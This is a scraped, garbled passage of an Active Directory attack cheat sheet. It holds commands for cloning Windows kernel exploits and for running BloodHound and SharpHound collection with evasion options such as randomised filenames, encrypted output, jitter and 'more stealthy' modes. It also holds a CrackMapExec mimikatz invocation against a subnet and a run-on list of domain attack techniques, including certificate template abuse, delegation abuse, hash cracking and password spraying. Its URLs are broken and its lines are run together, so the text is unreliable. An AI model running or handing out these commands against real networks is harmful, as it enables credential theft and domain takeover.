$ git clone https: // /SecWiki /windows -kernel -exploits # or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions) # Ĭollect more data for certificates exploitation using Certipy Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory # or remotely via BloodHound Python # īloodhound -python -d lab.local -u rsmith -p Winter2017 -gc -c all \ SharpHound.exe -c all ,GPOLocalGroup -outputdirectory C:\Windows\Temp -randomizefilenames -prettyjson -nosavecache -encryptzip -collectallproperties -throttle 10000 -jitter 23 # or run the collector on the machine using Powershell # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public \ SharpHound.exe -c all -LdapUsername -LdapPassword -domaincontroller 10.10. \ SharpHound.exe -c all -LdapUsername -LdapPassword -JSONFolder \ SharpHound.exe -CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy) \ SharpHound.exe -c all ,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default \ SharpHound.exe -c all -d active.htb -searchforest # run the collector on the machine using SharpHound.exe # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe Root cme mimikatz -server http -server -port 80 14.0 / 24 -u user -p 'Password ' -local -auth -M mimikatz Root cme smb -M name_module -o VAR = DATA Root wget https: // /byt3bl33d3r /CrackMapExec /releases /download /v5. # use the latest release, CME is now a binary packaged will all its dependencies Kerberos Bronze Bit Attack - CVE-2020-17049.Kerberos Resource Based Constrained Delegation.MS-EFSRPC Abuse with Unconstrained Delegation.SpoolService Abuse with Unconstrained Delegation.Privileged Access Management (PAM) Trust.Forest to Forest Compromise - Trust Ticket.Child Domain to Forest Compromise - SID Hijacking.GenericWrite and Remote Connection Manager.ESC7 - Vulnerable Certificate Authority Access Control.ESC3 - Misconfigured Enrollment Agent Templates.ESC2 - Misconfigured Certificate Templates.ESC1 - Misconfigured Certificate Templates.DNS Poisonning - Relay delegation with mitm6.LDAP signing not required and LDAP channel binding disabled.Capturing and cracking Net-NTLMv2/NTLMv2 hashes.Capturing and cracking Net-NTLMv1/NTLMv1 hashes.Password of Pre-Created Computer Account.Spray passwords against the RDP service.Passwords in SYSVOL
0 Comments
Leave a Reply. |